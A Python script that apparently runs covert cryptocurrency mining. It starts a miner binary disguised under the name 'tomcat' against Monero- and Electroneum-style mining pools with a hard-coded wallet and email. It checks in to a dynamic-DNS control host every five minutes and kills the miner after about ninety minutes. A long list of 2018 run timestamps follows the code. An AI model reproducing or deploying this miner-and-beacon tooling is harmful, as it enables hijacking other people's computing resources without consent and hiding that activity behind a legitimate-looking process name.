import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:51:01.766979
#2018-02-17 16:30:06.848219
#2018-02-17 18:17:07.066340
#2018-02-17 20:03:07.726911
#2018-02-17 21:52:01.779521
#2018-02-17 23:37:06.666822
#2018-02-18 01:26:04.436412
#2018-02-18 03:13:06.634137
#2018-02-18 05:02:01.698438
#2018-02-18 06:55:04.133091
#2018-02-18 08:43:06.116445
#2018-02-18 10:29:01.595267
#2018-02-18 12:15:02.904229
#2018-02-18 14:02:01.935352
#2018-02-18 15:52:07.416628
#2018-02-18 17:42:05.492247
#2018-02-18 19:29:03.552934
#2018-02-18 21:14:01.234963
#2018-02-18 23:02:04.220041
#2018-02-19 00:49:05.230027
#2018-02-19 02:36:01.369592
#2018-02-19 04:22:05.513783
#2018-02-19 06:07:05.766095
#2018-02-19 07:55:03.233133
#2018-02-19 09:46:05.350245
#2018-02-19 11:36:08.935265
#2018-02-19 13:23:08.670903
#2018-02-19 15:11:04.901066
#2018-02-19 16:58:06.557686
#2018-02-19 18:45:07.929749
#2018-02-19 20:35:06.986095
#2018-02-19 22:21:08.147514
#2018-02-20 00:08:05.440774
#2018-02-20 01:55:08.499048
#2018-02-20 03:44:04.696317
#2018-02-20 05:30:08.776074
#2018-02-20 07:14:04.388954
#2018-02-20 09:01:08.414863
#2018-02-20 10:44:05.864747
#2018-02-20 12:31:06.527631
#2018-02-20 14:17:08.348531
#2018-02-20 16:01:06.592881
#2018-02-20 17:48:08.597964
#2018-02-20 19:34:02.191636
#2018-02-20 21:22:04.771471
#2018-02-20 23:08:03.385767
#2018-02-21 00:53:05.458629
#2018-02-21 02:38:01.293392
#2018-02-21 04:26:02.207815
#2018-02-21 06:13:06.225916
#2018-02-21 07:59:07.648789
#2018-02-21 09:45:09.280960
#2018-02-21 11:35:07.825698
#2018-02-21 13:23:09.017360
#2018-02-21 15:07:08.697729
#2018-02-21 16:57:01.232589
#2018-02-21 18:47:10.683234
#2018-02-21 20:36:10.015716
#2018-02-21 22:22:04.180742
#2018-02-22 00:12:05.753106
#2018-02-22 01:59:01.824501
#2018-02-22 03:45:05.752022
#2018-02-22 05:32:01.951368
#2018-02-22 07:17:01.841259
#2018-02-22 09:05:07.635798
#2018-02-22 10:53:06.475069
#2018-02-22 12:38:06.127540
#2018-02-22 14:24:09.981163
#2018-02-22 16:11:06.978948
#2018-02-22 17:56:08.050026
#2018-02-22 19:46:05.633679
#2018-02-22 21:36:07.212340
#2018-02-22 23:23:05.196503
#2018-02-23 01:10:06.949848
#2018-02-23 02:57:04.139956
#2018-02-23 04:45:09.560464
#2018-02-23 06:31:04.331170
#2018-02-23 08:18:03.644963
#2018-02-23 10:34:07.295543
#2018-02-23 12:28:01.443908
#2018-02-23 14:16:05.022409
#2018-02-23 16:05:11.345235
#2018-02-23 17:51:09.905842
#2018-02-23 19:37:01.255898
#2018-02-23 21:20:06.336522
#2018-02-23 23:08:02.055174
#2018-02-24 00:55:06.157607
#2018-02-24 02:50:05.161533
#2018-02-24 04:40:08.693501
#2018-02-24 06:24:04.395962
#2018-02-24 08:12:05.414860
#2018-02-24 09:57:05.022224
#2018-02-24 11:56:06.573095
#2018-02-24 13:45:08.779322
#2018-02-24 15:34:06.034350
#2018-02-24 17:29:01.498061
#2018-02-24 19:16:06.966986
#2018-02-24 21:03:06.845288
#2018-02-24 23:37:05.754165
#2018-02-25 02:58:03.424143
#2018-02-25 07:06:03.833143